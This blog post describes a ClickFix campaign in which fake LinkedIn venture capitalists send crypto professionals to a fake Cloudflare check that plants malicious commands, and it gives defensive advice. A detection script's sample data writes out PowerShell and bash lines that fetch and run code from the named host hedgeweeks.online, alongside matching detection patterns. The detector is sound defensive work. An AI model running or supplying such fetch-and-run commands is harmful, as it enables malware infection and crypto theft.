How Fake LinkedIn VCs Use ClickFix Malware to Target Web3 and Crypto Pros
A dangerous new scam is hitting the crypto world. Bad actors are pretending to be venture capitalists on LinkedIn. They trick Web3 experts and crypto pros into clicking bad links. These links lead to malware that infects their computers. This attack uses a trick called ClickFix. It makes victims run harmful code without knowing.
If you work in blockchain, DeFi, or Web3, you need to know about this. Scammers create fake profiles. They promise big deals or jobs. But it’s all a trap to steal data or crypto. Let’s break down how it works and how to stay safe.
The Setup: Fake Profiles and Sweet-Talk Messages
The attack starts on LinkedIn. Scammers make profiles that look real. One example is “Mykhailo Hureiev,” who claims to be co-founder of SolidBit Capital. This is a fake VC firm. The profile has nice photos, a polished bio, and links to fake websites.
They send personal messages. These mention your recent posts, projects, or crypto work. It builds trust fast. Then, they offer partnerships, investments, or job talks in DeFi or blockchain.
Next, they push for a video call. They use Calendly links to set it up. But these links don’t go to real Zoom or Google Meet. They redirect to fake pages loaded with malware.
- Fake companies spotted: SolidBit Capital, MegaBit, Lumax Capital.
- All have pro-looking sites with AI-made team photos and fake histories.
- Domains registered recently, like lumax.capital on February 2, 2026.
Behind it all? Domains trace to “Anatolli Bigdasch” in Boston, Massachusetts. Email: anatollibigdasch0717@gmail.com. This could be stolen or made-up info.
What is ClickFix? The Sneaky Clipboard Trick
The fake meeting page shows a fake Cloudflare “I’m not a robot” box. It’s all fake HTML and CSS. No real Cloudflare. You click the checkbox to “verify.” Boom – JavaScript runs.
The script checks your browser’s User-Agent. It knows if you’re on Windows or macOS. Then, it copies a bad command to your clipboard. You think nothing happened. But now, if you paste it… trouble.
Windows Victims Get PowerShell Pain
On Windows, the clipboard gets a PowerShell command. It:
- Hides the window.
- Bypasses execution rules.
- Runs a remote script in memory with Invoke-Expression.
- Leaves no files for antivirus to find.
macOS Users Face Bash Nightmare
On Mac, it’s a bash one-liner. It:
- Checks for Python 3. Installs Homebrew if missing.
- Downloads a Python script from a bad server like hedgeweeks.online.
- Runs it with nohup bash to keep going even if you close the terminal.
Researchers found two Mac binaries. One is huge (9.3 MB) with junk code to fool tools like Ghidra. The other is small (37.6 KB) but same evil logic. Both dodged VirusTotal scans for a long time.
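The Windows and macOS payloads described above leave a recognizable footprint in process-creation telemetry, because each one stacks several traits that are individually common but rarely appear together in one command line. The following triage script is an added example, not code from the article or from the researchers it cites; the event records are constructed (invented hostnames, command lines modeled on the article's description, and hedgeweeks.online as the server the article names), and the indicator names and two-indicator threshold are my own choices.

```python
import re

# Constructed process-creation records, shaped like what an EDR or
# Sysmon-style pipeline would hand a triage script. The command lines are
# modeled on the article's description of the clipboard payloads; the
# hostnames are invented and hedgeweeks.online is the server the article names.
SAMPLE_EVENTS = [
    {"host": "win-ws-01", "cmdline": (
        'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command '
        '"Invoke-Expression (Invoke-RestMethod https://hedgeweeks.online/v)"')},
    # benign admin job: one indicator-adjacent flag, not the full stack
    {"host": "win-ws-02", "cmdline": (
        'powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1')},
    {"host": "mac-dev-07", "cmdline": (
        'bash -c "command -v python3 >/dev/null || brew install python3; '
        'curl -fsSL https://hedgeweeks.online/p.py -o /tmp/p.py; '
        "nohup bash -c 'python3 /tmp/p.py' >/dev/null 2>&1 &\"")},
    # benign developer job: nohup on its own is not a signal
    {"host": "mac-dev-08", "cmdline": 'bash -c "nohup python3 ./train.py > train.log 2>&1 &"'},
]

# Each indicator alone shows up in legitimate scripts; the payloads the
# article describes combine several of them in a single command line.
INDICATORS = {
    "windows": {
        "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
        "exec_policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)?\s+bypass\b", re.I),
        # a download cmdlet feeding Invoke-Expression, in either order
        "remote_in_memory": re.compile(
            r"\b(?:iex|invoke-expression)\b.*\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
            r"|\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b.*\|\s*(?:iex|invoke-expression)\b",
            re.I),
    },
    "macos": {
        "remote_fetch": re.compile(r"\b(?:curl|wget)\b[^;|&]*https?://", re.I),
        "nohup_bash": re.compile(r"\bnohup\s+bash\b", re.I),
        "python_or_brew_bootstrap": re.compile(r"\b(?:command -v|which)\s+python3\b|\bbrew\b", re.I),
    },
}
MIN_INDICATORS = 2  # assumed threshold: two traits from the same OS family


def score_cmdline(cmdline):
    """Return {family: [indicator names matched]} for one command line."""
    return {
        family: [name for name, rx in rules.items() if rx.search(cmdline)]
        for family, rules in INDICATORS.items()
    }


def triage(events, min_indicators=MIN_INDICATORS):
    """Flag events where one OS family's indicators reach the threshold."""
    hits = []
    for ev in events:
        for family, matched in score_cmdline(ev["cmdline"]).items():
            if len(matched) >= min_indicators:
                hits.append({"host": ev["host"], "family": family, "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['host']}: {hit['family']} ClickFix pattern, indicators={hit['indicators']}")
```

Run against the constructed events, only win-ws-01 and mac-dev-07 are flagged; the two admin and developer jobs fall below the threshold. Tune the regexes and threshold to your own telemetry: a mature hunt would also weigh the parent process and whether the fetched host is new to the environment, neither of which the article gives enough detail to model here.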
Links to Big Threat Groups?
This feels like pro work. It matches tricks from UNC1069, a group linked to North Korea. They’ve hit crypto before with LinkedIn lures and social engineering.
UNC1069 has been around since 2018. They love targeting blockchain jobs and investments. But no hard proof here. It could be copycats chasing crypto cash.
The campaign kicked off in early 2026. One victim, @0xbigdan on X, shared screenshots. The fake VC joined a real Google Meet, went quiet, then bailed when questioned.
Why Web3 Pros Are Perfect Targets
Crypto folks chase deals daily. New VCs pop up. LinkedIn is key for networking. Urgency makes you click fast. Scammers use this.
Red flags they push:
- Move chat off LinkedIn quick.
- Urgent calls about “hot opportunities.”
- Fake verification steps asking to paste commands.
How to Protect Yourself from ClickFix and Fake VCs
Don’t be a victim. Follow these simple steps:
1. Vet Profiles and Companies
- Check domain age with WHOIS.
- Google the firm and people.
- Look for AI-generated photos (reverse image search).
- Ask mutual connections.
2. Handle Links Smart
- Scan URLs with VirusTotal or URLScan.io before clicking.
- Use a virtual machine or sandbox for tests.
- Never paste clipboard commands into terminal or PowerShell.
3. Spot Social Engineering
- No real VC rushes you off LinkedIn.
- Verify via official channels.
- Report suspicious profiles to LinkedIn.
4. Tech Defenses
- Enable clipboard protection in antivirus.
- Use endpoint detection tools.
- Keep OS and browser updated.
Real services like Zoom or Cloudflare never ask you to run commands.
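Step 1's domain-age check is easy to automate once you have the registry record in hand. The script below is an added example, not part of the article: it parses RDAP-style JSON (the modern, machine-readable successor to WHOIS; the events array with eventAction and eventDate is the standard field) and flags domains registered within an assumed 180-day window. The records are constructed offline samples; the lumax.capital registration date is the one the article gives, the other two domains and the assessment date are made up so the check is reproducible without network access.

```python
import json
from datetime import datetime, timezone
from typing import Optional

# Constructed RDAP-style responses. Real RDAP servers return an "events"
# array whose entries carry eventAction/eventDate; the lumax.capital
# registration date is the one the article cites, the other two records
# are made up for contrast.
SAMPLE_RDAP = {
    "lumax.capital": json.dumps({
        "objectClassName": "domain", "ldhName": "lumax.capital",
        "events": [
            {"eventAction": "registration", "eventDate": "2026-02-02T14:31:00Z"},
            {"eventAction": "expiration", "eventDate": "2027-02-02T14:31:00Z"},
        ]}),
    "established.example": json.dumps({
        "objectClassName": "domain", "ldhName": "established.example",
        "events": [{"eventAction": "registration", "eventDate": "2011-06-15T09:00:00Z"}]}),
    # a record with no events at all (registry redaction or a broken lookup)
    "opaque.example": json.dumps({"objectClassName": "domain", "ldhName": "opaque.example"}),
}

# Assumed point in time for the check, so the example is reproducible offline.
ASSESSMENT_TIME = datetime(2026, 3, 1, tzinfo=timezone.utc)
YOUNG_DOMAIN_DAYS = 180  # assumed cutoff for "recently registered"


def registration_date(rdap_json: str) -> Optional[datetime]:
    """Pull the registration event out of an RDAP domain record."""
    record = json.loads(rdap_json)
    for event in record.get("events", []):
        if event.get("eventAction") == "registration":
            # RDAP dates are RFC 3339; spell out the Z offset for older Pythons
            return datetime.fromisoformat(event["eventDate"].replace("Z", "+00:00"))
    return None


def assess_domain(domain, rdap_json, now=ASSESSMENT_TIME, young_days=YOUNG_DOMAIN_DAYS):
    """Classify a domain as newly_registered, established or unknown."""
    registered = registration_date(rdap_json)
    if registered is None:
        # No date is not a clean result: treat it as needing manual review.
        return {"domain": domain, "registered": None, "age_days": None, "verdict": "unknown"}
    age_days = (now - registered).days
    verdict = "newly_registered" if age_days < young_days else "established"
    return {"domain": domain, "registered": registered.date().isoformat(),
            "age_days": age_days, "verdict": verdict}


def run_checks(samples=SAMPLE_RDAP):
    """Assess every sample record; returns {domain: assessment}."""
    return {domain: assess_domain(domain, raw) for domain, raw in samples.items()}


if __name__ == "__main__":
    for domain, result in run_checks().items():
        print(f"{domain}: {result['verdict']} "
              f"(registered {result['registered']}, age {result['age_days']} days)")
```

For a live check, fetch the record from the TLD's RDAP endpoint and pass the response body to `assess_domain`. A young domain is not proof of fraud and an old one is not proof of legitimacy; the point is that a "VC firm" whose domain is weeks old, as in the article's example, deserves the rest of the vetting steps before any call is accepted.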
The Bigger Picture: Crypto Security in 2026
Attacks like this show crypto’s hot target status. As Web3 grows, so do risks. Scammers mix social tricks with tech smarts. Stay alert.
Share this with your Web3 friends. Follow for more crypto security tips. What scams have you seen? Comment below.